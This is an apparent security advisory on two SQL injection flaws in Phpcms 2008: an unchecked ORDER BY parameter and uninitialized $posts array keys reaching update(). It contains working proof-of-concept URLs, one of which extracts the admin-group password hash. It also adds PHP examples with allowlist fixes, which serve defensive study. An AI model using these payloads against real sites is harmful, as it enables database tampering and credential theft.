Phpcms 2008: two SQL injection vulnerabilities - vulnerability warning - the black bar safety net

2010-10-19T00:00:00
ID MYHACK58:62201028142
Type myhack58
Reporter Anonymous
Modified 2010-10-19T00:00:00

Description

Phpcms is a widely used web content management system and also an open-source PHP development framework.

SQL injection I

In the file api/space.api.php:

    $arr_content = $content->listinfo("userid='$userid'", $order, 1, 10); // line 7

The listinfo() function in include/admin/content.class.php:

    function listinfo($where = '', $order = 'listorder DESC,contentid DESC', $page = 1, $pagesize = 50) // line 169
    {
        if($where) $where = "WHERE $where $this->userid_sql";
        if($order) $order = "ORDER BY $order";
        ......
        $result = $this->db->query("SELECT * FROM `$this->table` $where $order $limit"); // line 179

The variable $order is never initialized in space.api.php, so the value supplied in the request (the order parameter in the test URL) is passed straight into the ORDER BY clause without any validation or escaping, which is an SQL injection vulnerability.

Test method:

The program (method) provided on this site may be offensive in nature; it is for security research and teaching purposes only, use at your own risk!

    http://site/api/space.api.php?userid=2&order=if((select%20count(*)%20from%20phpcms_member)>1,contentid,1)%20desc%23

The injected IF() expression makes the result ordering depend on a condition evaluated against another table (here, whether phpcms_member holds more than one row), and the trailing %23 (#) comments out the rest of the statement.
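The following is an added example, not code from phpcms or from the advisory author. It reproduces the shape of the query built by listinfo() so the effect of the PoC payload is visible, and places an allowlist-based replacement next to it: ORDER BY cannot be parameterised with prepared statements, so the only robust fix is to accept nothing but known column names and ASC/DESC. The function names (build_list_query_vulnerable, safe_order, build_list_query_safe), the column list and the fixed LIMIT are assumptions made for this illustration.

```php
<?php
// Added example (not phpcms code): how an unvalidated $order reaches the
// SELECT built in listinfo(), and an allowlist-based replacement.
// Function names, the allowed column list and the LIMIT are assumptions.

// Vulnerable shape from the advisory: $order is interpolated verbatim.
function build_list_query_vulnerable($table, $where, $order)
{
    if ($where) $where = "WHERE $where";
    if ($order) $order = "ORDER BY $order";
    return "SELECT * FROM `$table` $where $order LIMIT 0,10";
}

// Allowlist: each comma-separated item must be a bare identifier from the
// allowed list, optionally followed by ASC or DESC. Anything else discards
// the whole clause in favour of the default ordering, so no attacker text
// ever reaches the query.
function safe_order($order, array $allowed_columns, $default = '`listorder` DESC,`contentid` DESC')
{
    $parts = array();
    foreach (explode(',', $order) as $item) {
        $item = trim($item);
        if ($item === '') continue;
        if (!preg_match('/^([A-Za-z0-9_]+)(?:\s+(ASC|DESC))?$/i', $item, $m)) {
            return $default;                       // malformed item: reject
        }
        if (!in_array(strtolower($m[1]), $allowed_columns, true)) {
            return $default;                       // unknown column: reject
        }
        $parts[] = '`' . $m[1] . '`' . (isset($m[2]) ? ' ' . strtoupper($m[2]) : '');
    }
    return $parts ? implode(',', $parts) : $default;
}

function build_list_query_safe($table, $userid, $order)
{
    $userid = intval($userid);                     // numeric parameter: cast it
    $order  = safe_order($order, array('listorder', 'contentid', 'updatetime'));
    return "SELECT * FROM `$table` WHERE userid='$userid' ORDER BY $order LIMIT 0,10";
}

// The advisory's PoC payload for the order parameter (constructed input,
// URL-decoded).
$payload = "if((select count(*) from phpcms_member)>1,contentid,1) desc#";

// Vulnerable: the payload lands inside ORDER BY and '#' comments out the LIMIT.
echo build_list_query_vulnerable('phpcms_content', "userid='2'", $payload), "\n";

// Hardened: the first item fails the identifier check, so the default is used.
echo build_list_query_safe('phpcms_content', '2', $payload), "\n";

// Hardened, legitimate input: a known column with an explicit direction.
echo build_list_query_safe('phpcms_content', '2', 'updatetime desc, contentid'), "\n";
```

Rejecting the whole clause rather than dropping the bad item keeps the behaviour simple to reason about: a request either uses an ordering the application knows about or gets the default, and the log line from such a rejection is itself a useful detection signal.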

SQL injection II

In the file ask/query.php:

    case 'edit_answer': // line 39
        if($dosubmit)
        {
            if(strlen($answertext) > 10000) showmessage('The answer cannot exceed 10000 characters');
            $posts['message'] = $M['use_editor'] ? $answertext : strip_tags($answertext);
            $answer->edit($pid, $posts, $_userid);

$answer->edit() in the file ask/include/answer.class.php:

    function edit($id, $posts, $userid) // line 109
    {
        $id = intval($id);
        $userid = intval($userid);
        if(!$id || !is_array($posts)) return false;
        if($userid) $sql = "AND userid=$userid";
        return $this->db->update($this->table_posts, $posts, "pid=$id $sql");
    }

db->update() in the file include/db_mysql.class.php:

    function update($tablename, $array, $where = '') // line 83
    {
        if($where)
        {
            $sql = '';
            foreach($array as $k=>$v)
            {
                $sql .= ", `$k`='$v'";
            }
            $sql = substr($sql, 1);
            $sql = "UPDATE $tablename SET $sql WHERE $where";

The array variable $posts is not initialized before $posts['message'] is assigned, so an array supplied in the request as posts[...] is kept and only has the message key added to it. update() then interpolates every key of that array into the SET clause as a column name, with no validation, which is an SQL injection vulnerability. Note that $pid is cast with intval(), so the injection point is the array key, not the WHERE clause.

Test method:

    http://site/ask/query.php?action=edit_answer&dosubmit=1&pid=2&posts[%6D%65%73%73%61%67%65%60%3D%28%73%65%6C%65%63%74%20%70%61%73%73%77%6F%72%64%20%66%72%6F%6D%20%70%68%70%63%6D%73%5F%6D%65%6D%62%65%72%20%77%68%65%72%65%20%67%72%6F%75%70%69%64%3D%31%29%20%77%68%65%72%65%20%61%73%6B%69%64%3D%32%23]

URL-decoded, the posts[] key is:

    message`=(select password from phpcms_member where groupid=1) where askid=2#

The leading backtick closes the quoted column name that update() wraps around the key, the subquery becomes the value written to message, and the # comments out the remainder of the statement (including the script's own message assignment and the pid=... WHERE clause), so the attacker controls both the SET and the WHERE of the UPDATE.

Solution: initialize the array variable $posts (for example $posts = array(); before $posts['message'] is assigned in ask/query.php) so that request-supplied keys cannot reach update(); the same applies to $order in api/space.api.php, which should be initialized and restricted to known columns before it is passed to listinfo().
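An added example (not phpcms code, not from the advisory author) that shows the two halves of the fix together: initializing $posts so request-supplied keys never reach update(), and an update() that refuses any column name outside an allowlist and escapes values. It also URL-decodes the advisory's PoC key to show what the vulnerable update() would build. The function names update_vulnerable and update_safe, the table name phpcms_ask_posts, the allowed column list and the use of addslashes() as a stand-in for a real database escaping function (use mysqli_real_escape_string() or prepared statements in production) are assumptions made for this illustration.

```php
<?php
// Added example (not phpcms code): why an uninitialized $posts lets a request
// choose column *names* in update(), and a hardened update(). The function
// names, the table name and the allowed column list are assumptions;
// addslashes() stands in for a real DB escaping function so this runs offline.

// Shape of the advisory's update(): keys and values are interpolated verbatim.
function update_vulnerable($tablename, array $array, $where)
{
    $sql = '';
    foreach ($array as $k => $v) {
        $sql .= ", `$k`='$v'";
    }
    $sql = substr($sql, 1);
    return "UPDATE $tablename SET $sql WHERE $where";
}

// Hardened: a column name must be a plain identifier that is also on the
// allowlist for this table; values are escaped before interpolation.
function update_safe($tablename, array $array, $where, array $allowed_columns)
{
    $set = array();
    foreach ($array as $k => $v) {
        if (!preg_match('/^[a-z0-9_]+$/i', $k) || !in_array($k, $allowed_columns, true)) {
            throw new InvalidArgumentException("refused column name: $k");
        }
        $set[] = "`$k`='" . addslashes($v) . "'";
    }
    if (!$set) {
        throw new InvalidArgumentException('nothing to update');
    }
    return "UPDATE `$tablename` SET " . implode(', ', $set) . " WHERE $where";
}

// The advisory's PoC: the posts[] key is URL-encoded SQL (constructed input).
$encoded_key = '%6D%65%73%73%61%67%65%60%3D%28%73%65%6C%65%63%74%20%70%61%73%73%77%6F%72%64'
             . '%20%66%72%6F%6D%20%70%68%70%63%6D%73%5F%6D%65%6D%62%65%72%20%77%68%65%72%65'
             . '%20%67%72%6F%75%70%69%64%3D%31%29%20%77%68%65%72%65%20%61%73%6B%69%64%3D%32%23';
$key = urldecode($encoded_key);
echo "decoded key: $key\n";

// What query.php does when $posts is NOT initialized: the request's posts[]
// array survives and the script merely appends its own 'message' key to it.
$posts = array($key => '');                       // attacker-controlled key
$posts['message'] = strip_tags('hello');
echo update_vulnerable('phpcms_ask_posts', $posts, 'pid=2 AND userid=5'), "\n";
// Everything after the '#' inside the key is a comment, so the UPDATE that
// actually runs is the attacker's SET ... WHERE askid=2, not the script's.

// The fix in query.php: start from an empty array, so only the script's own
// key is present when update() is called.
$posts = array();
$posts['message'] = strip_tags('hello');
echo update_safe('phpcms_ask_posts', $posts, 'pid=2 AND userid=5', array('message', 'updatetime')), "\n";

// Defence in depth: even if a hostile key reached update_safe(), it is refused.
try {
    update_safe('phpcms_ask_posts', array($key => ''), 'pid=2', array('message'));
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

Initializing $posts removes this particular path, but it does not make update() safe for any other caller that passes user-influenced keys; validating identifiers inside update() itself closes the whole class rather than one instance of it.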